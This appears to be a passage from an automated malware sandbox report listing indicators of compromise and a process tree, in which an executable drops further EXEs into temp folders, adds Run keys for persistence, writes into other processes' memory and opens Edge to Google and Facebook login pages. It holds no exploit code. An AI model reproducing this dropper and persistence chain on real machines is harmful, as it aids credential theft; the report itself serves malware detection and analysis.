1928	msedge.exe
1928	msedge.exe
1928	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeDebugPrivilege	7040	3D82.exe
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE

Suspicious use of FindShellTrayWindow 56 IoCs

pid	Process
4596	1tp87II1.exe
4596	1tp87II1.exe
4596	1tp87II1.exe
4596	1tp87II1.exe
4596	1tp87II1.exe
4596	1tp87II1.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe

Suspicious use of SendNotifyMessage 54 IoCs

pid	Process
4596	1tp87II1.exe
4596	1tp87II1.exe
4596	1tp87II1.exe
4596	1tp87II1.exe
4596	1tp87II1.exe
4596	1tp87II1.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2240	Broom.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3252	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4436 wrote to memory of 3012	4436	NEAS.599f6077a82b4742f12f029cbd9060f0.exe	86
PID 4436 wrote to memory of 3012	4436	NEAS.599f6077a82b4742f12f029cbd9060f0.exe	86
PID 4436 wrote to memory of 3012	4436	NEAS.599f6077a82b4742f12f029cbd9060f0.exe	86
PID 3012 wrote to memory of 4596	3012	ps8af17.exe	87
PID 3012 wrote to memory of 4596	3012	ps8af17.exe	87
PID 3012 wrote to memory of 4596	3012	ps8af17.exe	87
PID 4596 wrote to memory of 1668	4596	1tp87II1.exe	92
PID 4596 wrote to memory of 1668	4596	1tp87II1.exe	92
PID 4596 wrote to memory of 3100	4596	1tp87II1.exe	94
PID 4596 wrote to memory of 3100	4596	1tp87II1.exe	94
PID 4596 wrote to memory of 4260	4596	1tp87II1.exe	95
PID 4596 wrote to memory of 4260	4596	1tp87II1.exe	95
PID 4596 wrote to memory of 4656	4596	1tp87II1.exe	96
PID 4596 wrote to memory of 4656	4596	1tp87II1.exe	96
PID 4596 wrote to memory of 4984	4596	1tp87II1.exe	97
PID 4596 wrote to memory of 4984	4596	1tp87II1.exe	97
PID 4596 wrote to memory of 4952	4596	1tp87II1.exe	98
PID 4596 wrote to memory of 4952	4596	1tp87II1.exe	98
PID 4596 wrote to memory of 2128	4596	1tp87II1.exe	99
PID 4596 wrote to memory of 2128	4596	1tp87II1.exe	99
PID 4596 wrote to memory of 2728	4596	1tp87II1.exe	100
PID 4596 wrote to memory of 2728	4596	1tp87II1.exe	100
PID 4596 wrote to memory of 4328	4596	1tp87II1.exe	101
PID 4596 wrote to memory of 4328	4596	1tp87II1.exe	101
PID 4596 wrote to memory of 2492	4596	1tp87II1.exe	102
PID 4596 wrote to memory of 2492	4596	1tp87II1.exe	102
PID 2728 wrote to memory of 3512	2728	msedge.exe	106
PID 2728 wrote to memory of 3512	2728	msedge.exe	106
PID 1668 wrote to memory of 3108	1668	msedge.exe	103
PID 1668 wrote to memory of 3108	1668	msedge.exe	103
PID 3100 wrote to memory of 3972	3100	msedge.exe	105
PID 3100 wrote to memory of 3972	3100	msedge.exe	105
PID 4260 wrote to memory of 4492	4260	msedge.exe	104
PID 4260 wrote to memory of 4492	4260	msedge.exe	104
PID 3012 wrote to memory of 1664	3012	ps8af17.exe	108
PID 3012 wrote to memory of 1664	3012	ps8af17.exe	108
PID 3012 wrote to memory of 1664	3012	ps8af17.exe	108
PID 2492 wrote to memory of 3748	2492	msedge.exe	107
PID 2492 wrote to memory of 3748	2492	msedge.exe	107
PID 4656 wrote to memory of 3396	4656	msedge.exe	111
PID 4656 wrote to memory of 3396	4656	msedge.exe	111
PID 4328 wrote to memory of 3640	4328	msedge.exe	110
PID 4328 wrote to memory of 3640	4328	msedge.exe	110
PID 4984 wrote to memory of 432	4984	msedge.exe	113
PID 4984 wrote to memory of 432	4984	msedge.exe	113
PID 2128 wrote to memory of 3840	2128	msedge.exe	112
PID 2128 wrote to memory of 3840	2128	msedge.exe	112
PID 4952 wrote to memory of 4528	4952	msedge.exe	114
PID 4952 wrote to memory of 4528	4952	msedge.exe	114
PID 1664 wrote to memory of 1376	1664	2YG1412.exe	115
PID 1664 wrote to memory of 1376	1664	2YG1412.exe	115
PID 1664 wrote to memory of 1376	1664	2YG1412.exe	115
PID 1664 wrote to memory of 1376	1664	2YG1412.exe	115
PID 1664 wrote to memory of 1376	1664	2YG1412.exe	115
PID 1664 wrote to memory of 1376	1664	2YG1412.exe	115
PID 1664 wrote to memory of 1376	1664	2YG1412.exe	115
PID 1664 wrote to memory of 1376	1664	2YG1412.exe	115
PID 1664 wrote to memory of 1376	1664	2YG1412.exe	115
PID 1664 wrote to memory of 1376	1664	2YG1412.exe	115
PID 4436 wrote to memory of 5404	4436	NEAS.599f6077a82b4742f12f029cbd9060f0.exe	123
PID 4436 wrote to memory of 5404	4436	NEAS.599f6077a82b4742f12f029cbd9060f0.exe	123
PID 4436 wrote to memory of 5404	4436	NEAS.599f6077a82b4742f12f029cbd9060f0.exe	123
PID 3100 wrote to memory of 5444	3100	msedge.exe	118
PID 3100 wrote to memory of 5444	3100	msedge.exe	118

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3252
- C:\Users\Admin\AppData\Local\Temp\NEAS.599f6077a82b4742f12f029cbd9060f0.exe
  "C:\Users\Admin\AppData\Local\Temp\NEAS.599f6077a82b4742f12f029cbd9060f0.exe"
  2⤵
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:4436
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ps8af17.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ps8af17.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:3012
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1tp87II1.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1tp87II1.exe
      4⤵
      Executes dropped EXE
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:4596
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1668
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff90adb46f8,0x7ff90adb4708,0x7ff90adb4718
        6⤵
        
        PID:3108
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,16648434285841256891,6653472258087116823,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
        6⤵
        
        PID:6300
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,16648434285841256891,6653472258087116823,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6724
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3100
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff90adb46f8,0x7ff90adb4708,0x7ff90adb4718
        6⤵
        
        PID:3972
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1976,8252704074585936399,4570120116111039724,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5452
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1976,8252704074585936399,4570120116111039724,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
        6⤵
        
        PID:5444
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
        5⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:4260
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff90adb46f8,0x7ff90adb4708,0x7ff90adb4718
        6⤵
        
        PID:4492
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
        6⤵
        
        PID:5500
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5472
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2
        6⤵
        
        PID:5460
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
        6⤵
        
        PID:5856
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
        6⤵
        
        PID:5848
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:1
        6⤵
        
        PID:6080
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4120 /prefetch:1
        6⤵
        
        PID:6744
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4372 /prefetch:1
        6⤵
        
        PID:6648
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1
        6⤵
        
        PID:6404
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1
        6⤵
        
        PID:6496
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
        6⤵
        
        PID:6692
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1
        6⤵
        
        PID:6468
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:1
        6⤵
        
        PID:7724
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:1
        6⤵
        
        PID:7744
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:1
        6⤵
        
        PID:8112
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
        6⤵
        
        PID:6368
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6960 /prefetch:1
        6⤵
        
        PID:7172
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:1
        6⤵
        
        PID:7280
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6484 /prefetch:8
        6⤵
        
        PID:7824
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6484 /prefetch:8
        6⤵
        
        PID:6652
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
        6⤵
        
        PID:2500
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7180 /prefetch:1
        6⤵
        
        PID:6728
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7676 /prefetch:1
        6⤵
        
        PID:5920
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7804 /prefetch:1
        6⤵
        
        PID:5948
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
        6⤵
        
        PID:3756
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2220,5465765348220816259,14133901102076385152,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8120 /prefetch:8
        6⤵
        
        PID:4744
